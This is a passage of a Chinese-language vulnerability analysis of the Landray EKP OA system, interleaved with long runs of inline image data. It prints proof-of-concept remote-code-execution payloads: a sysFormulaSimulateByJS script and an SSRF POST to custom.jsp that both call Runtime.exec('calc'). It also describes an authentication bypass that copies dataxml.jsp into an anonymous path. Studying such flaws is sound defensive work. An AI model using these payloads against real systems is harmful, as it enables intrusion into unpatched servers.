6vAe9TdKWhti9/wWOHMjBMt33Ubvtm7C8i7jT+JtxFfsmtsCickS+C6+grQ0CdZObgADPW3M/q0mAKD/tJOo72mHtvVlHwsVHYvluE/Hksb48Dnz423p7vtYtDUAG6Y3h7GhDmasDcCvM88LNcHG9q6CpNR0LN52B+kSKSb84ik7VuPMD+4u407iY0wSNk5vhJi4VIxYdBliPW2M6VlZpXQooqMpHMuqvx4g4qNinzULttzGjuOB2DqrMSxMxZiz8RY6jDmOZ4d7QVMkyjGeHz4nYfOhx0I4r169gpubm0L42UlJScG9e/cwdOhQAEBycjLq1q0LDw8PXLx4EXfu3MGgQYNgbm6O9u1l6XXkyBHMnDkTy5cvR7FixTB58mQEBwcLNSbi4+MV+laLiopCamqqMN2xY0eEhITgzz//RGJiIkaOHInU1FThY7Mgrs/U1FSYmJgI07q6upg8ebIwnZycjDp16qBUqVLYsGEDbt++jd9++w2Wlpbo0KEDiAjBwcFYuHAhli9fDqlUihEjRsDAwAAzZsyAgYEB5s2bBwDo27cvGjRoAG9vbwCygklV0lNbWxuzZ89GixYt0KVLF1SrVg1dunRBqVKl0Lx5cwAokHsxKSkJwcHBWLNmDebNm4eXL19i1KhR8PDwQMOGDfm8/8vPu0gkgouLC16/fq3yNQEAQ7s5ISlVgnV/vUK6RIrfejjL9vFN1wOHz4dhTB9X9GxjhzlrnmLQzDt4fKixsDzsQyI27XsJ374u6NbaDnNXP4aeriY2TXcHAMxYG4jbD6Mx6hcXJKdIsWZnEPqnSXFgSTWUsNDD45cxSEiS4OaTz
<p>通过 <code>FormulaParser#parseValueScript()</code> 执行了传入的 script 脚本,尽管禁用了 unicode 以及一些黑名单,但未禁用 <code>Runtime.exec</code><code>ProcessBuilder</code>,所以仍然能够执行命令。</p>
<p><a id=img2 href=https://xzfile.aliyuncs.com/media/upload/picture/20240708185449-7f4d144c-3d18-1.png><img src=data:image/png;base64,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
<p>这种利用 bsh 的打法还有许多接口可用,在此不逐一举例,更多详情见:<a href=https://github.com/ax1sX/SecurityList/blob/main/Java_OA/LandrayEkpAudit.md target=_blank>LandrayEkpAudit</a></p>
<div class=highlight><pre><span></span><span class=nx>s_bean</span><span class=o>=</span><span class=nx>sysFormulaSimulateByJS</span><span class=o>&amp;</span><span class=nx>script</span><span class=o>=</span><span class=kd>var</span> <span class=nx>x</span> <span class=o>=</span> <span class=nb>Function</span><span class=cm>/**/</span><span class=p>(</span><span class=s1>'return(java.lang.Runtime.getRuntime())'</span><span class=p>)();</span><span class=nx>x</span><span class=p>.</span><span class=nx>exec</span><span class=p>(</span><span class=s2>"calc.exe"</span><span class=p>);</span><span class=kd>var</span> <span class=nx>a</span> <span class=o>=</span> <span class=nx>mainOutput</span><span class=p>();</span><span class=kd>function</span> <span class=nx>mainOutput</span><span class=p>()</span> <span class=p>{};</span>
</pre></div>
<h2 id=toc-4>漏洞绕过</h2>
<p>这个洞后来加了权限校验(WEB-INF/KmssConfig/sys/authentication/spring.xml),匿名用户仅允许访问以下接口:</p>
<div class=highlight><pre><span></span><span class=nt>&lt;property</span> <span class=na>name=</span><span class=s>"anonymousPaths"</span><span class=nt>&gt;</span>
<span class=nt>&lt;value&gt;</span>
/login*.jsp*; /resource/**; /service/**; /ui-ext/**; /*/*.index; /logout*; /admin.do*;
/browser.jsp*;/third/dingrobot/dingrobotCover.do*;
/axis/*; /kk*; /forward.html*; /sys/webservice/*;
/vcode*;/sys/authentication/validate*;/ui-ext/scormcourse/**;/*.txt;
/sys/print/word/file/**;/elec/rmkk/rmkk.do*;/elec/yqq/callback.do*;/sys/person/image.jsp*;/elec/sgt/callback.do*;/hr/recruit/invite_qr_code/*;
/sysInfo*;/data/sys-attachment/sysJgWebOffice/execute;/sys/anonymous/enter/token.do*;/**/*.woff2;/**/*.woff;/**/*.ttf;/**/*.svg;/**/*.eot
<span class=nt>&lt;/value&gt;</span>
<span class=nt>&lt;/property&gt;</span>
</pre></div>
<p>还有一种打法是通过custom.jsp去SSRF打dataxml.jsp。不过这里也已经无法利用了。</p>
<div class=highlight><pre><span></span><span class=nf>POST</span> <span class=nn>/ekp/sys/ui/extend/varkind/custom.jsp</span> <span class=kr>HTTP</span><span class=o>/</span><span class=m>1.1</span>
<span class=na>Content-Type</span><span class=o>:</span> <span class=l>application/x-www-form-urlencoded</span>
var={"body":{"file":"/sys/common/dataxml.jsp"}}&amp;s_bean=sysFormulaValidate&amp;script=Runtime.getRuntime().exec("calc")&amp;type=int&amp;modelName=test
</pre></div>
<p>在该系统V16版本中引入了<code>SysUiComponent</code>,并且在<code>design.xml</code>(WEB-INF/KmssConfig/sys/ui/design.xml)和<code>spring.xml</code>中忘记添加鉴权,导致可调用<code>SysUiComponentAction#getThemeInfo</code>进行文件上传。</p>
<div class=highlight><pre><span></span><span class=cp>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class=nt>&lt;configs</span>
<span class=na>xmlns=</span><span class=s>"http://www.example.org/design-config"</span>
<span class=na>xmlns:xsi=</span><span class=s>"http://www.w3.org/2001/XMLSchema-instance"</span>
<span class=na>xsi:schemaLocation=</span><span class=s>"http://www.example.org/design-config ../../design.xsd "</span><span class=nt>&gt;</span>
<span class=nt>&lt;module</span>
<span class=na>messageKey=</span><span class=s>"sys-ui:module.sys.ui"</span>
<span class=na>urlPrefix=</span><span class=s>"/sys/ui/"</span>
<span class=na>defaultValidator=</span><span class=s>"true"</span><span class=nt>&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"index.jsp*"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_ADMIN;SYSROLE_SYSADMIN)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"tools.jsp*"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_ADMIN;SYSROLE_SYSADMIN)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"tree.jsp*"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_USER)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"help/font/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_USER)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"help/component/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_ADMIN;ROLE_SYSPORTAL_BASE_SETTING)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"help/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_ADMIN;ROLE_SYSPORTAL_EXT_SETTING)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"demo/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_USER)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"jsp/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_USER)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"sys_ui_logo/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_ADMIN;SYSROLE_SYSADMIN)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"sys_ui_extend/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_ADMIN;ROLE_SYSPORTAL_EXT_SETTING)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"sys_ui_tool/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_ADMIN;SYSROLE_SYSADMIN)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"sys_ui_config/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_ADMIN;SYSROLE_SYSADMIN)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"sys_ui_qrcode/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_USER)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"/sys_ui_compress/sysUiCompress.do*"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_ADMIN;SYSROLE_SYSADMIN)"</span><span class=nt>/&gt;</span>
<span class=nt>&lt;/module&gt;</span>
<span class=nt>&lt;/configs&gt;</span>
</pre></div>
<p>这次漏洞的绕过方式是通过<code>SysUiComponentAction#replaceExtend()</code><code>dataxml.jsp</code>所在目录的文件复制到可访问的目录。</p>
<blockquote><p>借助这个漏洞,我们能够将其移动至无需鉴权的位置,也就是配置中的静态资源或者匿名路径所在之处。</p>
</blockquote>
<p><a id=img3 href=https://xzfile.aliyuncs.com/media/upload/picture/20240708185513-8d6b8e3c-3d18-1.png><img src="data:image/png;base64,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
<p>继续跟进,调用的是<code>SysUiComponentService#replaceExtend()</code></p>
<p><a id=img4 href=https://xzfile.aliyuncs.com/media/upload/picture/20240708185524-945dda06-3d18-1.png><img src="data:image/png;base64,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